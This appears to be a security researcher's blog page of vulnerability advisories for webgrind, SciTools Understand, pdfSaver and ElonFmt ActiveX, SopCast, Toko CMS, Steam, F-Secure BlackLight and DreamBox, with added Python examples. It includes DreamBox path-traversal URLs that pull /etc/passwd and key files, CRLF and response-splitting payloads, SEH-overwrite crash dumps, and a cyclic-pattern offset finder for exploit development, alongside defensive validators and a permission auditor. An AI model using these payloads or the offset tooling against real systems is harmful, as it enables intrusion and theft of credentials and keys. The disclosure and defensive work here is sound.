Posts Tagged ‘local’

webgrind 1.0 (file param) Local File Inclusion Vulnerability

webgrind suffers from a local file inclusion (LFI) vulnerability: input passed through the ‘file’ parameter to index.php is not properly verified before being used to include files. This can be exploited to include arbitrary local files by combining directory traversal sequences with a URL-encoded NULL byte (%00). Note that NULL-byte truncation of file paths only works on PHP builds older than 5.3.4, which started rejecting paths containing NUL; the traversal itself does not depend on it.


---------------------------
/index.php:
-----------
122: case 'fileviewer':
123: $file = get('file');
124: $line = get('line');
---------------------------

Advisory details: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5075.php

Thanks to Michael Meyer, OpenVAS Project.

SciTools Understand 2.6 (wintab32.dll) DLL Loading Arbitrary Code Execution

The vulnerability is caused by the application loading a library (wintab32.dll) in an insecure manner: the DLL is resolved through the Windows library search path rather than from a fixed location, and the current working directory, which becomes the share when a document is opened from there, is on that path. This can be exploited to load an arbitrary library by tricking a user into opening an Understand Project file (.UDB) located on a remote WebDAV or SMB share that also holds an attacker-supplied wintab32.dll.

The vendor has released a patched build for this issue: http://scitools.com/download/latest/Understand/Understand-2.6.600-Windows-32bit.exe

Advisory details: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5071.php

Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH)

The PDF Printer Preferences ActiveX control suffers from a stack-based buffer overflow. When an overly long string is passed as the sub_path argument of the StoreInRegistry method or as the sub_key argument of the InitFromRegistry method in the pdfxctrl.dll module, the copy runs past the end of the stack buffer and overwrites the SEH record; the crash output below shows the handler pointer replaced by 41414141. An attacker who gets a user to load the control can execute arbitrary code on the affected system in that user’s context.

Discovered on 25.01.2012 in the copy of the control bundled with Mindjet MindManager 2012 for Windows, version 10.0.493.

COMRaider Output:

-----------
Exception Code: ACCESS_VIOLATION
Disasm: 7C834D8F REP MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI] (KERNEL32.dll)

Seh Chain:
--------------------------------------------------
1 7C839AC0 KERNEL32.dll
2 41414141

Called From Returns To
--------------------------------------------------
KERNEL32.7C834D8F pdfxctrl.1001D8E7
pdfxctrl.1001D8E7 41414141

Registers:
--------------------------------------------------
EIP 7C834D8F -> Asc: SOFTWARE\Tracker Software\pdf
EAX 0013E9E0 -> Asc: SOFTWARE\Tracker Software\pdf
EBX 00000003
ECX 0000008C
EDX 00001815
EDI 0013FFFD -> 41000000
ESI 0013CD74 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 0013B780 -> 0013EDE4
ESP 0013B75C -> 0000302A -> Uni: *0*0

Block Disassembly:
--------------------------------------------------
7C834D82 MOV CL,[EDI+1]
7C834D85 INC EDI
7C834D86 TEST CL,CL
7C834D88 JNZ SHORT 7C834D82
7C834D8A MOV ECX,EDX
7C834D8C SHR ECX,2
7C834D8F REP MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI] <--- CRASH
7C834D91 MOV ECX,EDX
7C834D93 AND ECX,3
7C834D96 REP MOVS BYTE PTR ES:[EDI],BYTE PTR [ESI]
7C834D98 OR DWORD PTR [EBP-4],FFFFFFFF
7C834D9C CALL 7C802511
7C834DA1 RETN 8
7C834DA4 NOP
7C834DA5 NOP

ArgDump:
--------------------------------------------------
EBP+8 0013E9E0 -> Asc: SOFTWARE\Tracker Software\pdf
EBP+12 0013B790 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 41414141
EBP+20 41414141
EBP+24 41414141
EBP+28 41414141

Stack Dump:
--------------------------------------------------
13B75C 2A 30 00 00 84 63 18 00 03 00 00 00 5C B7 13 00 [.....c......\...]
13B76C 2A 30 00 00 AC F1 13 00 C0 9A 83 7C A8 4D 83 7C [.............M..]
13B77C 00 00 00 00 E4 ED 13 00 E7 D8 01 10 E0 E9 13 00 [................]
13B78C 90 B7 13 00 41 41 41 41 41 41 41 41 41 41 41 41 [................]
13B79C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]

-----------

CompanyName Tracker Software Products
FileDescription PDF Printer Preferences ActiveX
FileVersion 3.60.0128
InternalName pdfxctrl.dll
LegalCopyright Copyright © 2001-2006 by Tracker Software Products
OriginalFileName pdfxctrl.dll
ProductName Tracker Software Products pdfxctrl.PdfPrinterPreferences ActiveX
ProductVersion 3.60

Advisory ID: ZSL-2012-5067 (Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH))
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5067.php

SopCast 3.4.7.45585 Multiple Vulnerabilities

SopCast suffers from a stack-based buffer overflow when parsing user input supplied through the SoP protocol in the sopocx.ocx module, allowing an attacker to gain system access and execute arbitrary code on the affected machine. The issue is triggered by a sop:// URI (GET) whose channel segment is 514 bytes long: the application opens the link (channel) and crashes. The application crashes even with ‘sop://[anything]’ because it fails to properly sanitize and handle the URI segment, but with exactly 514 bytes the stack is overflowed and the Buffer Overrun error box pops up. Unsuccessful attempts result in a denial of service. The ‘<address>’ element of the favorites.xml file can also be used as the attack vector.

SopCast is also vulnerable to an elevation of privileges vulnerability that can be used by any local user to replace the executable with a binary of choice. The vulnerability exists because of improper permissions: the ‘Everyone’ group has the ‘F’ flag (full control) on the ‘Diagnose.exe’ binary bundled with the SopCast installation package.

Advisories:

ZSL-2011-5062 SopCast 3.4.7 (Diagnose.exe) Improper Permissions
ZSL-2011-5063 SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer Overflow PoC

Toko Lite CMS Multiple XSS POST Injection / CRLF Injection / HTTP Response Splitting

Toko CMS suffers from an XSS vulnerability when parsing user input passed to the ‘currPath’ and ‘path’ parameters via POST in ‘editnavbar.php’. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session. Input passed to the ‘charSet’ parameter in ‘edit.php’ is not properly sanitised before being returned to the user in a response header. Because carriage return and line feed characters are not filtered, this can be exploited to insert arbitrary HTTP headers into the response sent to the user (CRLF injection) and, with an injected blank line, to split the response entirely.

Advisory ID: ZSL-2011-5047
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5047.php
PoC: http://www.zeroscience.mk/codes/tokocms_xss.txt

Advisory ID: ZSL-2011-5048
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5048.php
PoC: http://www.zeroscience.mk/codes/tokocms_crlf.txt
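The charSet header injection described above, as an added example that is not Toko CMS code: a constructed Python model of a script that copies the parameter straight into the Content-Type header, the CRLF payloads that turn that into header injection and response splitting, and the token check a fixed edit.php would need. The payload strings, the response body and every function name here are this example’s own.

```python
"""Added example, not Toko CMS code: header injection and response splitting
through a charset parameter, next to the check that prevents it."""
import re

CRLF = "\r\n"


def build_response_vulnerable(charset: str, body: str = "<html></html>") -> bytes:
    """Echo charSet into Content-Type unchecked, as the advisory describes."""
    head = (f"HTTP/1.1 200 OK{CRLF}"
            f"Content-Type: text/html; charset={charset}{CRLF}"
            f"Content-Length: {len(body)}{CRLF}{CRLF}")
    return head.encode("latin-1") + body.encode("latin-1")


# A charset label is a plain token: letters, digits, '.', '_' and '-'.
# Anything else (CR, LF, spaces, ':' or ';') cannot be part of a valid label.
CHARSET_TOKEN = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,39}$")


def charset_is_safe(charset: str) -> bool:
    """True only for values that can be placed in a header verbatim."""
    return CHARSET_TOKEN.match(charset) is not None


def build_response_fixed(charset: str, body: str = "<html></html>") -> bytes:
    """Validate before use; a malformed label falls back to a fixed default
    instead of being echoed, so no attacker bytes reach the header block."""
    if not charset_is_safe(charset):
        charset = "UTF-8"
    return build_response_vulnerable(charset, body)


def parse_headers(raw: bytes):
    """Headers of the first response in the stream, as a browser reads them."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    headers = []
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers.append((name.strip(), value.strip()))
    return headers


def count_responses(raw: bytes) -> int:
    """How many HTTP responses a client would see in this byte stream."""
    return len(re.findall(rb"(?m)^HTTP/1\.[01] \d{3} ", raw))


# Constructed payloads, written as they look after URL decoding
# (%0d%0a on the wire becomes CRLF before the application sees them).
COOKIE_INJECT = "UTF-8\r\nSet-Cookie: session=attacker"
SPLIT = ("UTF-8\r\nContent-Length: 0\r\n\r\n"
         "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 25\r\n\r\n"
         "<script>alert(1)</script>")


if __name__ == "__main__":
    print(parse_headers(build_response_vulnerable(COOKIE_INJECT)))
    print(count_responses(build_response_vulnerable(SPLIT)), "responses in the split stream")
    print(count_responses(build_response_fixed(SPLIT)), "response after validation")
```

The second payload is the response-splitting case: the injected blank line ends the first response early, and everything after it is parsed by the client as a second, attacker-authored response, which is what makes cache poisoning and XSS through a proxy possible.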

net4visions.com Multiple Products Multiple Vulnerabilities

The iGallery, iManager and iBrowser plugins for WYSIWYG editors such as TinyMCE, SPAW, htmlArea, Xinha and FCKeditor suffer from multiple vulnerabilities, including reflected (non-persistent) cross-site scripting, local file inclusion, file disclosure and arbitrary file deletion.

The iManager plugin has three parameters that trigger the vulnerabilities mentioned above: ‘d’, ‘lang’ and ‘dir’. iBrowser and iGallery use the same scripts, with the ‘dir’ and ‘lang’ parameters triggering the corresponding issues. Advisories below:

ZSL-2011-5046 iGallery Plugin v1.0.0 (dir) Remote Cross-Site Scripting Vulnerability
ZSL-2011-5045 iManager Plugin v1.2.8 (dir) Remote Cross-Site Scripting Vulnerability
ZSL-2011-5044 iBrowser Plugin v1.4.1 (dir) Remote Cross-Site Scripting Vulnerability
ZSL-2011-5043 iManager Plugin v1.2.8 (d) Remote Arbitrary File Deletion Vulnerability
ZSL-2011-5042 iManager Plugin v1.2.8 (lang) Local File Inclusion Vulnerability
ZSL-2011-5041 iBrowser Plugin v1.4.1 (lang) Local File Inclusion Vulnerability

F-Secure BlackLight 2.2.1092 Local Privilege Escalation Vulnerability

Vendor: F-Secure Corporation
Product web page: http://www.f-secure.com

http://www.f-secure.com/en_EMEA-Labs/security-threats/tools/blacklight/

Affected version: 2.2.1092

Summary: F-Secure BlackLight is a tool that detects files, folders and
processes hidden from the user and other programs. BlackLight is also
able to remove hidden malware by renaming them.

Desc: The rootkit eliminator is vulnerable to an elevation of privileges
vulnerability which can be used by any local user to replace the executable
file with a binary of choice. The vulnerability exists due to improper
permissions: the ‘Everyone’ group has the ‘C’ flag (change/write) on the
‘fsbl.exe’ binary file, as the cacls output below shows.

Tested on: Microsoft Windows XP Professional SP3 (EN)

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
@zeroscience

Advisory ID: ZSL-2011-5038
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5038.php

10.08.2011

C:\>cacls fsbl.exe
C:\fsbl.exe BUILTIN\Administrators:F
Everyone:C
LABPC\User4:F
NT AUTHORITY\SYSTEM:F

C:\>


Valve Steam Client Application v1559/1559 Local Privilege Escalation

Steam is vulnerable to an elevation of privileges vulnerability which can be used by any local user to replace the executable with a binary of choice. The vulnerability exists due to improper permissions: the “Users” group has the “F” flag (Full Control) on the binary files Steam.exe, GameOverlayUI.exe and steamerrorreporter.exe. Steam.exe is registered by default as a startup program with the “-silent” parameter, so a replaced binary is executed automatically at logon without any further user action.


C:\Program Files\Steam>cacls Steam.exe
C:\Program Files\Steam\Steam.exe BUILTIN\Users:F <---
NT AUTHORITY\SYSTEM:F
BUILTIN\Power Users:C
BUILTIN\Administrators:F
LABPC\User101:F

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5022.php
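The three permission findings on this page (Diagnose.exe, fsbl.exe and Steam.exe) share one condition: a principal that every local user belongs to holds F, C or W on an executable that a more privileged account or an autostart entry will run. The following added Python example, not code from any of the advisories, parses cacls output and flags exactly that condition. The fsbl.exe and Steam.exe listings are the ones quoted above; the Diagnose.exe install path and listing, and the hardened tool.exe entry, are constructed for the example, and `audit_live` is only meant to be run on a Windows host.

```python
"""Added example, not from the advisories: find binaries that low-privileged
principals can overwrite, from cacls output like the listings on this page."""
import re
import subprocess
import sys

# Principals every local user belongs to; write access for them on an
# executable is a local privilege escalation once a higher-privileged
# account (or an autostart entry) runs the file.
LOW_PRIV = {
    "everyone", "users", "builtin\\users",
    "authenticated users", "nt authority\\authenticated users",
    "interactive", "nt authority\\interactive",
}
# cacls letters that permit replacing the file: Full, Change, Write.
# Power Users is deliberately not in LOW_PRIV: it is not an everyone-group.
WRITE_RIGHTS = {"F", "C", "W"}
# "principal:(OI)(CI)F" with optional inheritance flags before the letter.
ACE_RE = re.compile(r"^(?P<principal>[^:]+?):(?P<inherit>(?:\([A-Z]+\))*)(?P<rights>[A-Z])$")

CACLS_SAMPLES = {
    # From the BlackLight advisory above.
    r"C:\fsbl.exe": r"""C:\fsbl.exe BUILTIN\Administrators:F
            Everyone:C
            LABPC\User4:F
            NT AUTHORITY\SYSTEM:F
""",
    # From the Steam advisory above (the "<---" marker removed).
    r"C:\Program Files\Steam\Steam.exe": r"""C:\Program Files\Steam\Steam.exe BUILTIN\Users:F
                                  NT AUTHORITY\SYSTEM:F
                                  BUILTIN\Power Users:C
                                  BUILTIN\Administrators:F
                                  LABPC\User101:F
""",
    # Constructed: the SopCast advisory gives the ACE but not the install path.
    r"C:\Program Files\SopCast\Diagnose.exe": r"""C:\Program Files\SopCast\Diagnose.exe Everyone:(OI)(CI)F
                                       BUILTIN\Administrators:F
""",
    # Constructed: what a correctly installed binary should look like.
    r"C:\Program Files\Hardened\tool.exe": r"""C:\Program Files\Hardened\tool.exe BUILTIN\Users:R
                                    BUILTIN\Administrators:F
                                    NT AUTHORITY\SYSTEM:F
""",
}


def parse_cacls(path: str, output: str):
    """Return (principal, inheritance flags, rights letter) per ACE line.
    cacls prints the path in front of the first ACE and indents the rest;
    entries it cannot express as one letter ("special access") are skipped."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if m:
            aces.append((m.group("principal").strip(), m.group("inherit"), m.group("rights")))
    return aces


def weak_aces(path: str, output: str):
    """ACEs that let any local user overwrite the binary."""
    return [(path, principal, rights)
            for principal, _, rights in parse_cacls(path, output)
            if principal.lower() in LOW_PRIV and rights in WRITE_RIGHTS]


def audit(samples=CACLS_SAMPLES) -> dict:
    """Run the check over captured cacls output; {path: [findings]}."""
    return {path: weak_aces(path, out) for path, out in samples.items()}


def audit_live(paths) -> dict:
    """Same check against the live system. cacls is deprecated but still
    shipped; icacls prints a different format and needs its own parser."""
    if sys.platform != "win32":
        raise RuntimeError("cacls is only available on Windows")
    return {p: weak_aces(p, subprocess.run(["cacls", p], capture_output=True,
                                           text=True).stdout)
            for p in paths}


if __name__ == "__main__":
    for path, findings in audit().items():
        print(path, "->", findings or "ok")
```

The fix on the installer side is the mirror image of the check: executables under Program Files get Users:R (and no Everyone entry at all), with write access reserved for Administrators and SYSTEM.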

DreamBox DM500(+) Arbitrary File Download Vulnerability

The Dreambox web interface suffers from an arbitrary file download vulnerability through directory traversal: prefixing the requested path with URL-encoded ‘/../’ sequences (%2f..%2f) in the HTTP GET request to the affected host, and terminating it with an encoded NULL byte (%00), returns files from outside the web root. An attacker can obtain sensitive information such as paid channel keys, usernames, passwords, configuration and plug-in data, etc.

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd%00

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../Autoupdate.key%00

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../camd3.config%00

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5013.php
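The webgrind ‘file’ parameter, the iManager/iBrowser ‘lang’ parameter and the Dreambox download handler all fail in the same way: a user-controlled path reaches a file API before traversal sequences, percent-encoding and NUL bytes have been dealt with. The following added Python example, not code from any of those projects, shows the canonicalisation such a handler needs and runs the Dreambox request paths quoted above, plus a few constructed variants, against it. The `/var/www` and `/srv/src` base directories and the benign file names are assumptions made for the example.

```python
"""Added example (not code from webgrind, the net4visions plugins or the
Dreambox firmware): the path canonicalisation a hardened include/download
handler needs, exercised with the traversal strings quoted on this page."""
import posixpath
from urllib.parse import unquote


class PathRejected(ValueError):
    """Raised when a user-supplied path must not be served."""


def safe_resolve(base_dir: str, user_path: str, allowed_ext: tuple = ()) -> str:
    """Map an untrusted path onto a file below base_dir or raise PathRejected.

    Order matters: decode once (the web server or PHP has normally done this
    before the application sees the value), refuse NUL before any C-level
    file API can truncate on it, refuse absolute paths, then normalise and
    make sure nothing still points above base_dir.
    """
    decoded = unquote(user_path)
    if "\x00" in decoded:
        raise PathRejected("NUL byte in path")
    if "\\" in decoded:
        raise PathRejected("backslash in path")
    if decoded.startswith("/"):
        raise PathRejected("absolute path")
    norm = posixpath.normpath(decoded)
    if norm in ("", ".", "..") or norm.startswith("../"):
        raise PathRejected("traversal outside base directory")
    if allowed_ext and not norm.endswith(allowed_ext):
        raise PathRejected("extension not allowed")
    # On a real filesystem, follow up with os.path.realpath() and confirm the
    # result still starts with base_dir, so a symlink cannot reopen the hole.
    return posixpath.join(base_dir, norm)


def resolve_or_reason(base_dir: str, user_path: str, allowed_ext: tuple = ()) -> str:
    """Same as safe_resolve, but report the rejection instead of raising."""
    try:
        return safe_resolve(base_dir, user_path, allowed_ext)
    except PathRejected as exc:
        return f"REJECTED: {exc}"


# Constructed inputs: two request paths from the Dreambox advisory above,
# traversal variants without the NUL byte, and two benign paths.
PAYLOADS = {
    "dreambox_passwd": "/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd%00",
    "dreambox_keys": "/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00",
    "dreambox_no_nul": "/%2f..%2f..%2fetc/passwd",
    "lfi_leading": "..%2f..%2f..%2fetc%2fpasswd",
    "lfi_inner": "img/..%2f..%2f..%2fetc%2fpasswd",
    "benign_plain": "css/style.css",
    "benign_inner_dotdot": "css/../css/style.css",
}


def evaluate(webroot: str = "/var/www") -> dict:
    """Feed every payload through the handler as a web server would (the
    leading '/' of the URL path stripped); {name: resolved path or reason}."""
    return {name: resolve_or_reason(webroot, path.lstrip("/"))
            for name, path in PAYLOADS.items()}


if __name__ == "__main__":
    for name, result in evaluate().items():
        print(f"{name:22} {result}")
    # webgrind-style: an include that may only ever pull in .php sources.
    print(resolve_or_reason("/srv/src", "lib/util.php", (".php",)))
    print(resolve_or_reason("/srv/src", "config.ini", (".php",)))
```

Note that `lstrip` only removes literal slashes: the encoded `%2f` survives into `unquote`, which is exactly why the Dreambox payloads start with `%2f` and why the absolute-path check is needed after decoding rather than before.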

Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)

The ElonFmt ActiveX Control Module suffers from a buffer overflow vulnerability. When a large buffer is sent to the pid item of the GetItem1 function in the elonfmt.ocx module, several registers are overwritten, including the SEH handler. A character translation is involved: the values that end up in EIP, ECX and the SEH chain (AAAAAAAA in the COMRaider output, BBBBBBBB/CCCCCCCC/DDDDDDDD in the WinDbg session below) are transformed versions of the supplied string, which has to be taken into account when building a payload. An attacker can gain access to the system on the affected node and execute arbitrary code.

-----------------------------------------------------------------
CompanyName
FileDescription ElonFmt ActiveX Control Module
FileVersion 1, 1, 14, 1
InternalName ElonFmt
LegalCopyright Copyright (C) 2002 - 2008 Gesytec GmbH
OriginalFileName ElonFmt.OCX
ProductName ElonFmt ActiveX Control Module
ProductVersion 1, 1, 14, 1
-----------------------------------------------------------------

Exception Code: ACCESS_VIOLATION
Disasm: AAAAAAAA ????? ()

Seh Chain:
--------------------------------------------------
1 7C9032BC ntdll.dll
2 AAAAAAAA

Registers:
--------------------------------------------------
EIP AAAAAAAA
EAX 00000000
EBX 00000000
ECX AAAAAAAA
EDX 7C9032BC -> 04244C8B
EDI 00000000
ESI 00000000
EBP 0013E7F8 -> 0013E8A8
ESP 0013E7D8 -> 7C9032A8

Block Disassembly:
--------------------------------------------------
AAAAAAAA ????? <--- CRASH

ArgDump:
--------------------------------------------------
EBP+8 0013E8C0 -> C0000005
EBP+12 0013ECF0 -> AAAAAAAA
EBP+16 0013E8DC -> 0001003F
EBP+20 0013E894 -> 7C96F3BC
EBP+24 AAAAAAAA
EBP+28 00000236

Stack Dump:
--------------------------------------------------
13EBA8 01 00 00 00 00 00 00 00 08 AF 47 00 81 18 C3 77 [..........G....w]
13EBB8 14 2C 00 00 A2 56 00 10 41 ED 13 00 E8 EB 13 00 [.....V..........]
13EBC8 20 8F 63 01 B8 8E 63 01 81 18 C3 77 01 00 00 00 [..c...c....w....]
13EBD8 64 21 12 77 FF 00 00 00 74 E1 97 7C 51 7C 91 7C [d..w....t...Q...]
13EBE8 AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA [................]

-----------------------------------------------

(fc.1608): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=cccccccc edx=7c9032bc esi=00000000 edi=00000000
eip=cccccccc esp=0013e7d8 ebp=0013e7f8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
cccccccc ?? ???
0:000> !exchain
0013e7ec: ntdll!ExecuteHandler2+3a (7c9032bc)
0013ecf0: cccccccc
Invalid exception stack at bbbbbbbb
0:000> u 0013ecf0
0013ecf0 bbbbbbbbcc mov ebx,0CCBBBBBBh
0013ecf5 cc int 3
0013ecf6 cc int 3
0013ecf7 cc int 3
0013ecf8 dddd fstp st(5)
0013ecfa dddd fstp st(5)
0013ecfc dddd fstp st(5)
0013ecfe dddd fstp st(5)

0:000> d esp
0013eb58 01 00 00 00 8d 61 53 80-7c 5a 63 af 00 00 00 00 .....aS.|Zc.....
0013eb68 88 d5 2e ba 00 00 00 00-24 46 53 8a 00 86 8f bf ........$FS.....
0013eb78 a8 5a 63 af a8 5a 63 af-fb 0a 80 bf 60 29 53 89 .Zc..Zc.....`)S.
0013eb88 ce 86 8f bf 68 d5 2e ba-88 d5 2e ba 00 00 00 00 ....h...........
0013eb98 06 00 05 00 a1 00 00 00-2e 0e 73 74 d1 18 43 7e ..........st..C~
0013eba8 01 00 00 00 00 00 00 00-40 f7 47 00 81 18 c3 77 ........@.G....w
0013ebb8 1a 03 00 00 a2 56 00 10-00 ed 13 00 e8 eb 13 00 .....V..........
0013ebc8 20 8f 63 01 b8 8e 63 01-81 18 c3 77 01 00 00 00  .c...c....w....
0:000> d
0013ebd8 64 21 12 77 ff 00 00 00-74 e1 97 7c 51 7c 91 7c d!.w....t..|Q|.|
0013ebe8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ebf8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ec08 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ec18 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ec28 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ec38 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ec48 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0:000> d
0013ebe8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ebf8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ec08 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ec18 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ec28 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ec38 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ec48 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ec58 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0:000> d
0013ec68 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ec78 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ec88 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ec98 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013eca8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ecb8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ecc8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ecd8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0:000> d
0013ece8 aa aa aa aa aa aa aa aa-bb bb bb bb cc cc cc cc ................
0013ecf8 dd dd dd dd dd dd dd dd-dd ad d0 01 01 00 63 01 ..............c.
0013ed08 00 00 00 00 b8 8e 63 01-01 00 00 00 00 ed 13 00 ......c.........
0013ed18 82 a5 00 10 8c ed 13 00-b8 8e 63 01 28 ee 13 00 ..........c.(...
0013ed28 00 00 00 00 80 02 63 01-80 ed 13 00 ae 43 dd 73 ......c......C.s
0013ed38 5c ed 13 00 d8 f0 00 10-02 00 00 00 d9 a3 00 10 \...............
0013ed48 80 02 63 01 24 8e 56 01-01 00 00 00 78 8e 63 01 ..c.$.V.....x.c.
0013ed58 48 ed 13 00 80 ed 13 00-98 f0 00 10 01 00 00 00 H...............

Advisory ID: ZSL-2011-5011
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5011.php
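Both SEH crashes on this page (pdfxctrl.dll and ElonFmt.ocx) were reproduced with a buffer of one repeated byte, which proves the handler is overwritten but says nothing about the offset at which it happens. The added Python example below, not part of either advisory, is the usual next step: a Metasploit-style cyclic pattern, an offset lookup that accounts for the little-endian register values a debugger prints, and a constructed model of a stack frame (a fixed buffer followed by the SEH record) to show the round trip. It also shows why a 41414141 or AAAAAAAA value cannot be mapped back. The buffer size and pattern length are assumptions; the 7C9032BC handler address in the model is the ntdll!ExecuteHandler2 value from the ElonFmt dump.

```python
"""Added example, not part of the advisories: cyclic pattern and SEH offset
lookup. The frame model below is constructed; real controls differ."""
import string
import struct


def pattern_create(length: int) -> bytes:
    """Return `length` bytes of the Aa0Aa1...Zz9 sequence, the same one
    Metasploit's pattern_create.rb emits. Every 4-byte window is unique
    within the first 20280 bytes, which is what makes the lookup exact."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length exceeds one pattern period (20280 bytes)")


def pattern_offset(pattern: bytes, value):
    """Find where a 32-bit value from a crash dump lies in the pattern.
    `value` is an int or the hex string a debugger prints (e.g. "41346241").
    x86 stores it little-endian, so the bytes are reversed before searching.
    Returns the offset, or None if those bytes never occurred in the pattern,
    which is what an all-'A' buffer or a translated value gives you."""
    if isinstance(value, str):
        value = int(value, 16)
    idx = pattern.find(struct.pack("<I", value))
    return idx if idx >= 0 else None


def simulate_seh_overwrite(payload: bytes, buffer_size: int) -> dict:
    """Constructed frame: a fixed buffer followed by the SEH record (next
    pointer, then handler; the handler is the ntdll address from the ElonFmt
    dump). The payload is copied without a bounds check, as in the vulnerable
    controls, so it runs over the record. Returns the record as a debugger
    would print it."""
    frame = bytearray(buffer_size) + struct.pack("<II", 0xFFFFFFFF, 0x7C9032BC)
    frame[: len(payload)] = payload   # the unbounded copy
    nseh, seh = struct.unpack_from("<II", frame, buffer_size)
    return {"nseh": f"{nseh:08X}", "seh": f"{seh:08X}"}


def locate(pattern_len: int = 5000, buffer_size: int = 2048) -> dict:
    """Crash the model with a pattern and map both SEH fields back to offsets
    (assumed sizes; pick pattern_len larger than the crash length you found)."""
    pat = pattern_create(pattern_len)
    crash = simulate_seh_overwrite(pat, buffer_size)
    return {**crash,
            "nseh_offset": pattern_offset(pat, crash["nseh"]),
            "seh_offset": pattern_offset(pat, crash["seh"])}


if __name__ == "__main__":
    print(locate())
    # An all-'A' overwrite (41414141) or a translated one (AAAAAAAA) cannot be
    # mapped back, which is why a pattern is sent instead of 'A' * n.
    pat = pattern_create(5000)
    print(pattern_offset(pat, "41414141"), pattern_offset(pat, "AAAAAAAA"))
```

With a real target you would pass `pattern_create(n)` through the ActiveX method, read the SEH chain with `!exchain`, and hand that value to `pattern_offset`; a `None` result means the bytes in the dump are not the bytes you sent, which is how the character translation in the ElonFmt case shows up before any offset work can start.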